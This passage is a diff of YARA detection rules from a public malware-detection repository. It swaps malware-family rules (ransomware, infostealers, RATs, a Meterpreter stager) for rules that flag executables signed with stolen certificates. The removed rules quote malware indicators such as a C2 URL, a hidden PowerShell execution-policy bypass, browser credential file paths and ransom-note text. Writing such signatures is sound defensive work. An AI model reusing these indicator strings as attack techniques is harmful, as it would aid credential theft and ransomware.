+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d096db0c-05f6-5b69-9d84-0105f2182ff3"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "3cd08af1-8999-59a8-a679-a39871ecf68e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3366-L3382"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6787-L6799"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64d551e0c11b6394f9ae2b8fa749c36cb1b5c3f498592f95dc19fdea23c53160"
+		logic_hash = "226dfe366c31e9cb38910df7d6cb2037c545745594fd133d7b7359175f153a90"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ExpressCMS"
-
-	strings:
-		$s1 = "/click.php?cnv_id=" fullword wide
-		$s2 = "/click.php?key=" wide
-		$s3 = "jdlnb" fullword wide
-		$s4 = "Gkjfdshfkjjd: dsdjdsjdhv" fullword wide
-		$s5 = "--elevated" fullword wide
-		$s6 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%d" wide
-		$s7 = "\\Microsoft\\Manager.exe" fullword wide
-		$s8 = "\\Microsoft\\svchost.exe" fullword wide
+		thumbprint = "6daa64d7af228de45ded86ad4d1aeaa360295f56"
+		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CIBIKART d.o.o." and pe.signatures [ i ] . serial == "74:c9:4e:f6:97:dc:97:83:f8:45:d2:6d:cc:c1:e7:fd" )
 }
-rule DITEKSHEN_MALWARE_Win_Meterpreterstager : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5Dd1Cb148A90123Dcc13498B54E5A798 : FILE
 {
 	meta:
-		description = "Detects Meterpreter stager payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dfbc37e9-13e0-55e2-a501-1005eea52b63"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8bdc91bc-5a59-5c22-8d39-fe1bf4267813"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3384-L3395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6801-L6812"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0ac53a10abb1e4dd7da57872cd1779851d953127a912c31a5e411d8eb9bd07f4"
+		logic_hash = "9b5ec1b9d3fd15259d3628b5199b274f85674b404c57329d8af4f779ae357454"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "PAYLOAD:" fullword ascii
-		$s2 = "AQAPRQVH1" fullword ascii
-		$s3 = "ws2_32" fullword ascii
-		$s4 = "KERNEL32.dll" fullword ascii
+		thumbprint = "3a7c692345b67c7a2b21a6d94518588c8bbe514c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and filesize < 100KB
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "33adab6a2ixdac07i4cLb4ac05j6yG2ew95e" and pe.signatures [ i ] . serial == "5d:d1:cb:14:8a:90:12:3d:cc:13:49:8b:54:e5:a7:98" )
 }
-rule DITEKSHEN_MALWARE_Win_Ziggy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A758504E7971869D0Aec2775Fffa03D5 : FILE
 {
 	meta:
-		description = "Detects Ziggy ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6d2d316a-cf19-5001-bf94-842346229d76"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "1ecfe521-0148-5a13-b23f-dd1b14b835ed"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3397-L3421"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6814-L6829"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "103a50511971161ca673e0c8378aeca2fa7d0f6309966bbb2b70e0d039e0f196"
+		logic_hash = "08f52e96d1e93e2d406753fd0dee5d03501ac037ab022b710362b113eaae6239"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920098"
-		snort3_sid = "920096"
-		clamav_sig = "MALWARE.Win.Ransomware.Ziggy"
-
-	strings:
-		$id1 = "/Ziggy Info;component/mainwindow.xaml" fullword wide
-		$id2 = "AZiggy Info, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
-		$id3 = "Ziggy Ransomware" fullword wide
-		$id4 = "clr-namespace:Zeggy" fullword ascii
-		$s1 = "GetCooldown" fullword ascii
-		$s2 = "checkCommandMappings" fullword ascii
-		$s3 = "add_OnExecuteCommand" fullword ascii
-		$s4 = "MindLated.jpg" fullword wide
-		$s5 = "http://fixfiles.xyz/ziggy/api/info.php?id=" fullword wide
-		$s6 = "Reamaining time:" fullword wide
-		$msg1 = "<:In case of no answer in 12 hours write us to this e-mail" ascii
-		$msg2 = "Free decryption as guarantee" fullword ascii
-		$msg3 = "# Do not try to decrypt your data using third party software, it may cause permanent data loss" ascii
-		$msg4 = "# Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can becom" ascii
+		thumbprint = "646bbb3a37cc004bea6efcd48579d1a5776cb157"
+		hash1 = "3194e2fb68c007cf2f6deaa1fb07b2cc68292ee87f37dff70ba142377e2ca1fa"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $id* ) or 4 of ( $s* ) or 3 of ( $msg* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Nworm : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F13A4F94Bf233525 : FILE
 {
 	meta:
-		description = "Detects NWorm/N-W0rm payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "06546ccf-8914-5b1c-942f-99664b9ecf44"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "1d048571-661e-5d7f-a255-f07b84069b20"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3423-L3443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6831-L6845"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1397a057422be260b5bdf1eb58571e95c259c132cc2518b39e1524a0eda9c66"
+		logic_hash = "29284d9ced0d5e6d587edc9727321cdc7bf5ce4ad8407d460afa7f1e6d1bcb90"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.NWorm"
-
-	strings:
-		$id1 = "N-W0rm" ascii
-		$id2 = "N_W0rm" ascii
-		$x1 = "pongPing" fullword wide
-		$x2 = "|NW|" fullword wide
-		$s1 = "runFile" fullword wide
-		$s2 = "runUrl" fullword wide
-		$s3 = "killer" fullword wide
-		$s4 = "powershell" fullword wide
-		$s5 = "wscript.exe" fullword wide
-		$s6 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" fullword wide
-		$s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
-		$s8 = "Start-Sleep -Seconds 1.5; Remove-Item -Path '" fullword wide
+		thumbprint = "974eb056bb7467d54aae25a908ce661dac59c786"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $id* ) and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of ( $x* ) and 2 of ( $s* ) ) or 7 of ( $s* ) or 10 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SocketOptionName" and ( pe.signatures [ i ] . serial == "f1:3a:4f:94:bf:23:35:25" or pe.signatures [ i ] . serial == "00:f1:3a:4f:94:bf:23:35:25" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Qakbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_119Acead668Bad57A48B4F42F294F8F0 : FILE
 {
 	meta:
-		description = "Detects variants of QakBot payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3a3b3b6c-0969-584e-a184-7acfca3cdd42"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "d3f45ee1-134f-5b16-81f8-83405a5e3181"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3445-L3457"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6847-L6858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b64c05eb7ac03b2b4709f9979d117e4cacc617f21d0b3bf1c1be42aa18cc44cc"
+		logic_hash = "bae9aed4f53059b2ec0de630f681bb157c148d9ad38be35dd8c1a74b19619077"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "stager_1.dll" fullword ascii
-		$s2 = "_vsnwprintf" fullword ascii
-		$s3 = "DllRegisterServer" fullword ascii
-		$s4 = "Win32_PnPEntity" fullword wide
-		$s5 = "0>user32.dll" fullword ascii
+		thumbprint = "11ff68da43f0931e22002f1461136c662e623366"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" )
 }
-rule DITEKSHEN_MALWARE_Win_Fonix : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_21144343720267Ba42F586105Ff279De : FILE
 {
 	meta:
-		description = "Detects Fonix ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d67cce49-5f4f-59f6-b2a9-9c4dd1c6c0f6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "54e4133f-4fb7-5f70-a4dc-77c6f8120d29"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3459-L3481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6860-L6871"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "159b8946f7772c76271de821eb12897689bf73d96fc6a1d7c4a65cdc50b877c7"
+		logic_hash = "a1eacebed0966ad5d78eb7e38d8b854d183f21a19a53bbcb57503e4271b2cc84"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Fonix"
-
-	strings:
-		$s1 = "dontcryptanyway" fullword wide
-		$s2 = "Cpriv.key" ascii wide
-		$s3 = "Cpub.key" ascii wide
-		$s4 = "NetShareEnum() failed!Error: % ld" fullword wide
-		$s5 = "<div class='title'> Attention!</div><ul><li><u><b>DO NOT</b> pay" wide
-		$s6 = "Encryption Completed !!!" fullword wide
-		$s7 = "kill process" fullword ascii
-		$s8 = "Copy SystemID C:\\ProgramData\\SystemID" ascii
-		$id1 = "].FONIX" fullword wide
-		$id2 = "xinofconfig.txt" fullword ascii wide
-		$id3 = "XINOF4MUTEX" wide
-		$id4 = ":\\Fonix\\cryptoPP\\" ascii
-		$id5 = "schtasks /CREATE /SC ONLOGON /TN fonix" ascii
-		$id6 = "Ransomware\\Fonix" ascii
+		thumbprint = "c56f79b4cc3a0e0894cd1e54facdf2db9d8ca62a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 3 of ( $id* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Varta Blue Dynamic" and pe.signatures [ i ] . serial == "21:14:43:43:72:02:67:ba:42:f5:86:10:5f:f2:79:de" )
 }
-rule DITEKSHEN_MALWARE_Win_Bobik : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A3Cb8E964244768969B837Ca9981De68 : FILE
 {
 	meta:
-		description = "Detects Bobik infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "12f14151-0c89-519d-85d3-4b4b82a950a3"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a9d74cc6-0d89-5de9-8f13-966455e49b9c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3483-L3498"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6873-L6884"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "735dcb9e04956863305ca89a43686b8e48e3b20784ae9292cfc40d1c2c09d467"
+		logic_hash = "d88c9ac03a4b3803b85c5ee30ad127aca43cbfc33d754bc42c15593f7294b1bc"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Bobik"
-
-	strings:
-		$s1 = "@Default\\Login Data" fullword ascii
-		$s2 = "@Default\\Cookies" fullword ascii
-		$s3 = "@logins.json" fullword ascii
-		$s4 = "@[EXECUTE]" fullword ascii
-		$s5 = "@C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$s6 = /(CHROME|OPERA|FIREFOX)_BASED/ fullword ascii
-		$s7 = "threads.nim" fullword ascii
+		thumbprint = "5617114bc2a584532eba1dd9eb9d23108d1f9ea7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" or pe.signatures [ i ] . serial == "00:a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" )
 }
-rule DITEKSHEN_MALWARE_Win_Runningrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bd96F0B87Edca41E777507015B3B2775 : FILE
 {
 	meta:
-		description = "Detects RunningRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "161faa8c-614e-5102-bb6d-c1ed4abf8274"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5ef0b542-01de-53ee-9a52-0a05bccccd22"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3500-L3536"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6886-L6900"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3cddec792ad95d823190f12970b8e0515b73be4a91f89cbb2bbde2fa1cfde63"
+		logic_hash = "a9906821de34bf6a20bfe1a4be81563a22b110bde68fbe36b491955c23d2dcc6"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RunningRAT"
-
-	strings:
-		$s1 = "%s%d.dll" fullword ascii
-		$s2 = "/c ping 127.0.0.1 -n" ascii
-		$s3 = "del /f/q \"%s\"" ascii
-		$s4 = "GUpdate" fullword ascii
-		$s5 = "%s\\%d.bak" fullword ascii
-		$s6 = "\"%s\",MainThread" ascii
-		$s7 = "rundll32.exe" fullword ascii
-		$rev1 = "emankcosteg" fullword ascii
-		$rev2 = "ini.revreS\\" fullword ascii
-		$rev3 = "daerhTniaM,\"s%\" s%" ascii
-		$rev4 = "s% etadpUllD,\"s%\" 23lldnuR" ascii
-		$rev5 = "---DNE yromeMmorFdaoL" fullword ascii
-		$rev6 = "eMnigulP" fullword ascii
-		$rev7 = "exe.23lldnuR\\" fullword ascii
-		$rev8 = "dnammoc\\nepo\\llehs\\" ascii
-		$rev9 = "\"s%\" k- exe.tsohcvs\\23metsyS\\%%tooRmetsyS%" ascii
-		$rev10 = "emanybtsohteg" fullword ascii
-		$rev11 = "tekcosesolc" fullword ascii
-		$rev12 = "tpokcostes" fullword ascii
-		$rev13 = "emantsohteg" fullword ascii
-		$v2_1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword ascii
-		$v2_2 = "LoadFromMemory END---" fullword ascii
-		$v2_3 = "hmProxy!= NULL" fullword ascii
-		$v2_4 = "Rundll32 \"%s\",DllUpdate %s" fullword ascii
-		$v2_5 = "ipip.website" fullword ascii
-		$v2_6 = "%d*%sMHz" fullword ascii
-		$v2_7 = "\\Server.ini" fullword ascii
+		thumbprint = "abfa72d4a78a9e63f97c90bcccb8f46f3c14ac52"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $rev* ) or 6 of ( $v* ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ООО \"СМ\"" and ( pe.signatures [ i ] . serial == "bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" or pe.signatures [ i ] . serial == "00:bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent05 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E41537B8Dd65670D6Eb01954Becacf1E : FILE
 {
 	meta:
-		description = "Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a8a72484-42be-5c5c-962b-75bed8acdf39"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "80ac0d4e-5865-562a-a4a1-fa02b6859bdb"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3538-L3551"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6902-L6916"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e8c7c03451bbfcba7a1ab02f8c1320ad50d17d2e990f0e2f89942faea2a1e531"
+		logic_hash = "94b7feb2d1ed8a7004599ac2018746bf43529f7cf7c4776fbdf21282013935c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent05"
-
-	strings:
-		$s1 = "MARCUS.dll" fullword ascii wide
-		$s2 = "GZipStream" fullword ascii
-		$s3 = "MemoryStream" fullword ascii
-		$s4 = "proj_name" fullword ascii
-		$s5 = "res_name" fullword ascii
+		thumbprint = "150ff604efa1e4868ea47c5d48244e57fa4b9196"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marketing Concept s.r.o." and ( pe.signatures [ i ] . serial == "e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" or pe.signatures [ i ] . serial == "00:e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Nemty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_06808C5934Da036A1297A936D72E93D4 : FILE
 {
 	meta:
-		description = "Detects Nemty/Nefilim ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "361269c6-5215-5ecf-869c-3c55ff8387e1"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "c75ae0da-e8b9-581f-bfde-f23b3b3f9d22"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3553-L3577"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6918-L6929"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dcebcddc472f4fb3bb34c35fc5a5424e54bfc3a262fdae10b189d210217b9b37"
+		logic_hash = "45840d354dcea86c38effc86b3b6f92540f32eab78286d51ff7f472618accb8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID:" ascii
-		$s2 = "GOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOther_MathPOSTALCODEPhoenicianSaurasht" ascii
-		$s3 = "crypto/x509.ExtKeyUsage" ascii
-		$s4 = "crypto/x509.KeyUsageContentCommitment" ascii
-		$s5 = "DEK-Info header" ascii
-		$s6 = "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePacific SA Standard TimeQueryPerformanceCounter" fullword ascii
-		$s7 = "*( -  <  =  >  k= m=%: +00+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12..." ascii
-		$s8 = "Go cmd/compile go1.10" fullword ascii
-		$s9 = ".dllprogramdatarecycle.bin" ascii
-		$s10 = ".dll.exe.lnk.sys.url" ascii
-		$vx1_1 = "Fa1led to os.OpenFile()" ascii
-		$vx1_2 = "-HELP.txt" ascii
-		$vf1_1 = "main.CTREncrypt" fullword ascii
-		$vf1_2 = "main.FileSearch" fullword ascii
-		$vf1_3 = "main.getdrives" fullword ascii
-		$vf1_4 = "main.RSAEncrypt" fullword ascii
-		$vf1_5 = "main.SaveNote" fullword ascii
+		thumbprint = "efb70718bc00393a01694f255a28e30e9d2142a4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or ( all of ( $vx* ) and 2 of ( $s* ) ) or all of ( $vf* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhaon Entertainment Inc" and pe.signatures [ i ] . serial == "06:80:8c:59:34:da:03:6a:12:97:a9:36:d7:2e:93:d4" )
 }
-rule DITEKSHEN_MALWARE_Win_Qnapcrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_97D50C7E3Ab45B9A441A37D870484C10 : FILE
 {
 	meta:
-		description = "Detects QnapCrypt/Lockedv1/Cryptfile2 ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3ef5643a-f2af-5d62-8927-e46679e069c2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "54c391df-ea76-5944-aae6-63f44ec557e5"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3579-L3607"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6931-L6942"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68fc3f0503d82295ffa5bfb49bda8b790142913217775a2812e3965a6c9a1fe1"
+		logic_hash = "2f535f66a4aabffff48f167ffcabcb366398e358eaafa2b3d67ee4c7ad19eb66"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "Encrypting %s..." ascii
-		$s2 = "\\Start Menu\\Programs\\StartUp\\READMEV" ascii
-		$s3 = "main.deleteRecycleBin" ascii
-		$s4 = "main.encryptFiles" ascii
-		$s5 = "main.antiVirtualBox" ascii
-		$s6 = "main.antiVmware" ascii
-		$s7 = "main.deleteShadows" ascii
-		$s8 = "main.delUAC" ascii
-		$s9 = "main.KillProcess" ascii
-		$s10 = "main.delExploit" ascii
-		$s11 = "main.encrypt" ascii
-		$s12 = "main.ClearLogDownload" ascii
-		$s13 = "main.ClearLog" ascii
-		$s14 = "main.EndEncrypt" ascii
-		$s15 = "main.RunFuckLogAndSoft" ascii
-		$s16 = "main.ClearUsercache" ascii
-		$s17 = "main.FirstDuty" ascii
-		$s18 = ".lockedv1" ascii
-		$s19 = "WSAStartup\\clear.bat\\ngrok.exe\\video.mp4" ascii
-		$s20 = "net stop " ascii
+		thumbprint = "2e47ceb6593c9fdbd367da8b765090e48f630b33"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $go and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHENZHEN MINIWAN TECHNOLOGY CO. LTD." and pe.signatures [ i ] . serial == "97:d5:0c:7e:3a:b4:5b:9a:44:1a:37:d8:70:48:4c:10" )
 }
-rule DITEKSHEN_MALWARE_Win_Alfonoso : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0B2B192657B37632518B08A06E201381 : FILE
 {
 	meta:
-		description = "Detects Alfonoso / Shurk / HunterStealer infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2766e74e-c13a-5ce4-8f62-de9cc11e3cf0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "917d2d66-f4b4-59b1-aeed-3b10c337d4b8"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3609-L3638"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6944-L6955"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "18e5731ffd70abf2ab70852d54dacc3588dd90cfb4f2ceaee66dfce750535b26"
+		logic_hash = "361005555e5d4b51c4538617c99fe668fca61ccc0c0847611e1423f69194999c"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920102"
-		snort3_sid = "920100"
-		clamav_sig = "MALWARE.Win.Trojan.Alfonso"
-
-	strings:
-		$s1 = "%s\\etilqs_" fullword ascii
-		$s2 = "SELECT name, rootpage, sql FROM '%q'.%s" fullword ascii
-		$s3 = "%s-mj%08X" fullword ascii
-		$s4 = "| Site:" ascii
-		$s5 = "| Login:" ascii
-		$s6 = "| Password:" ascii
-		$s7 = "| BUILD NAME:" ascii
